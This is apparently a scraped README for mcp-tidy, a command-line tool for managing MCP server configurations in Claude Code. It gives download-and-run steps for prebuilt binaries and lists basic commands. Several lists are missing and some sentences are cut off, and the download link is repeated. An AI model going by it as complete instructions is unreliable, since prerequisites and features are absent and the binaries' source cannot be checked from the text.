Welcome to mcp-tidy, a user-friendly command-line tool designed to help you visualize and manage MCP server configurations in Claude Code. With mcp-tidy, you can easily list your servers, analyze usage statistics, and clean up unused servers, making server management straightforward.
Before you begin, make sure you have the following:
To get started with mcp-tidy, visit this page to download: mcp-tidy Releases.
mcp-tidy-windows.exe, mcp-tidy-macos, or mcp-tidy-linux).Once downloaded, you can install the tool:
mcp-tidy-windows.exe file.cd ~/Downloads
chmod +x mcp-tidy-macos
./mcp-tidy-macos
cd ~/Downloads
chmod +x mcp-tidy-linux
./mcp-tidy-linux
After installation, you can begin using mcp-tidy in your terminal. Here are some basic commands to get you started:
mcp-tidy list
mcp-tidy analyze
mcp-tidy cleanup
mcp-tidy includes a variety of features designed for effective server management:
mcp-tidy is licensed under the MIT License. You are free to use, modify, and distribute this software with proper attribution.
If you wish to contribute to mcp-tidy, feel free to check out the GitHub repository. Contributions are welcome, and we appreciate any help to improve the software!
For additional help regarding mcp-tidy, please refer to the issues section on our GitHub page. You can report any bugs or request new features.
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Download mcp-tidy again here: mcp-tidy Releases